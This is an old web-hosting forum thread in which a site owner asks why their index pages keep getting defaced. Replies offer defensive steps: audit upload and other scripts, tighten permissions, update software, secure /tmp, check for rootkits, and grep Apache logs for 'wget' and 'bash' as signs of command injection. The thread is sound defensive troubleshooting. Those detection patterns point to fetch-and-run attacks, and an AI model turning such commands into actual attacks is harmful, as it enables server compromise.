Results 1 to 15 of 15
  1. #1

    Site Keeps Getting Hacked

    My site keeps getting hacked with this Infektion Group thing.

    http://t9xdesigns.ih0p.com/hacker.gif

    It's just the index files that keep getting hacked. So I just go into my ftp and replace them, but the hacker keeps on doing it. Is there anyway to stop this?

  2. #2
    Join Date
    Jan 2002
    Location
    Home, chair
    Posts
    723
    Do you have any cgi/php scripts on your site?

  3. #3
    Yeah, just scripts like a hit counter, image uploader, and stuff like that.

  4. #4
    Join Date
    Jan 2002
    Location
    Home, chair
    Posts
    723
    Well, one of them could be poorly written, my bet is it's the image uploader, it lets the attacker do the query injection and replace the index file on your site.

  5. #5
    I don't know, because the image uploader I use has a log with all the ip's and what everyone uploads, and all of them say either .gif, .jpeg, ect.

  6. #6
    Join Date
    Jan 2002
    Location
    Home, chair
    Posts
    723
    Well,
    check your site logs and see if you can find any tracks of how they replace your index page, but that they do it through a poorly coded script on your site is 99%.

  7. #7
    Join Date
    Aug 2002
    Posts
    512
    Just try and check your logs. If you can't find them or if you don't have them ask your webhoster for help or just replace your scripts for a while. If they can hack it so far, the might hack you introuble even more so your site will be used for illegal transportation of files, you'd never know untill you get a bandwith bill.

  8. #8
    check your folder
    search about *.pl or *.cgi *.php not used

    and see if the index.html have 777 permision change it to 744 or 444
    see if your php in safe mode or not
    and see log file

  9. #9
    Join Date
    Mar 2001
    Posts
    1,434
    grep "wget", "index", "bash", etc... in your weblog and see if anything comes up out of the ordinary. Probably escaping from one of your scripts and running commands directly on the server.

    Also check ps aux output to see if there are any long running scripts. chkrootkit would help as well.

    - John C.

  10. #10
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    DO you have an old kernel?

    Depending on your linux skills, i suggest hiring some help there are many people here that can help. theres easyservermanagement.com, serveradmins.biz, linux-tech.net, wemanageservers.com, etc.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  11. #11
    1) check kernel version (should be at least 2.4.25)
    2) check for problematic cgi/php scripts, mostly look for dangerous functions / places where you don't validate the information you get as an input from the browser
    3) have an up to date web server
    4) check that you don't have ports that are opened with no use on your server.
    5) check for known security problems on other services as well.

    see y'a

  12. #12
    Join Date
    Jun 2003
    Posts
    961
    if they are coming back often check for rootkits (http://www.webhostingtalk.com/showth...hreadid=228109), maybe some backdoor installed

  13. #13
    Join Date
    Jul 2002
    Location
    Kuwait
    Posts
    10,573
    secure your /tmp dir

    if cpanel run
    /scripts/securetmp

    ls -al /tmp there should be somthing called
    /tmp/axp if i'm not mistaken and something.cgi not sure what are the names exactly
    Bashar Al-Abdulhadi - KuwaitNET Internet Services Serving customers since 1997
    Kuwait's First Webhosting and Domain Registration provider - an ICANN Accredited Registrar

    Twitter: Bashar Al-Abdulhadi

  14. #14
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    11,687
    If it's just YOUR specific site that keeps getting hacked, it's most likely none of the above. Those would indicate the server itself being hacked, not your specific site.
    Steps to stop something like this are rather simple:
    A> Change your password and give it out to NOBODY
    B> Remove all scripts that you didn't specifically write. Most likely these are the cause of your hack. If you can't remove, then at least verify that they're secure. Most aren't.
    C> Change your public_html permissions so that only YOU can write to this folder, not nobody, not your group.
    D> Change your index_html so that only YOU can write to this file, not nobody, not your group.

    If you're running a bulletin board, then this most likely needs to be updated as well.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  15. #15
    Join Date
    Apr 2003
    Location
    San Francisco, CA
    Posts
    428
    I bet its your vbulletin:

    http://www.vbulletin.org/forum/showthread.php?t=59841

    this post maybe:
    http://www.vbulletin.org/forum/showp...72&postcount=2

    Your calendar.php script maybe...

    HTH
    Hostito, Inc. - Web Hosting & Reseller Plans
    http://www.hostito.com
    [email protected] - 1 888 467 8486

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •